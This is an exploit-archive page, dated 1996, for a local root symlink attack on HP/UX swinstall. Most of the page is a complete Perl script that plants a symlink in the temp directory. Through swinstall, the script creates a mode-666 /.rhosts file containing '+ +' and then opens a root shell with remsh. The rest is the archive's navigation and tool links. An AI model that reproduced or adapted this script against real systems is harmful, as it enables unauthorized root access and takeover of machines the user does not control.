swinstall symlink exploit

Summary
Description:Standard symlink hole
Author:"Salty"
Compromise: root (local)
Vulnerable Systems:HP/UX with vulnerable swinstall, mostly 10.x, some 9.x
Date:6 October 1996
Notes:See the SOD HP Bug of the Week page
Details

Exploit:

#!/usr/bin/perl

# swinstall is a new utility for super-EZ software installation.
# it also happens to make any file you like, and it will do so
# mode 666... Hooray for it!                  -Salty 8/6/96

# 9.x=/usr/tmp 10.X=/var/tmp... -- not many 9.X's will have swinstall,
# it's not standard, for 9, really.. 10, yes, 9 Mmmm.. There's a version
# of it _for_ 9.x, but it does seem rare..

$swinstall="/usr/sbin/swinstall";
stat($swinstall) || do {
  print STDERR "I can only work on systems that have swinstall loaded..\n";
  print STDERR "Yours doesn't seem to...\n";
  exit;
  };

if ($#ARGV<0) {
  $newfile="/.rhosts";
  } else {
  $newfile="$ARGV[0]";
  }

if (-f "$newfile") {
  print STDERR "$newfile exists!\n";
  print STDERR "I can only make files that don't already exist..\n";
  exit;
  }

open(UNAME,"uname -r|");
chop($uname=);
$uname=~s/^..(..)...$/$1/;
umask(0000);
$num=sprintf("%05d",$$+3); # two for exec, three for system.
$tmpfile="/usr/tmp/AAAa$num";
$tmpfile="/var/tmp/AAAa$num" if $uname eq "10";
symlink($newfile,$tmpfile);

print "Please wait one moment while I do stuff...\n";
system("/usr/sbin/swinstall -s '\
+ +
' -p bob localhost:/");
#unlink($tmpfile);
if ($newfile eq "/.rhosts") {
  system("remsh localhost -l root ksh -i");
  } else {
  system(">$newfile;ls -l $newfile");
  }


More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resouces:

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault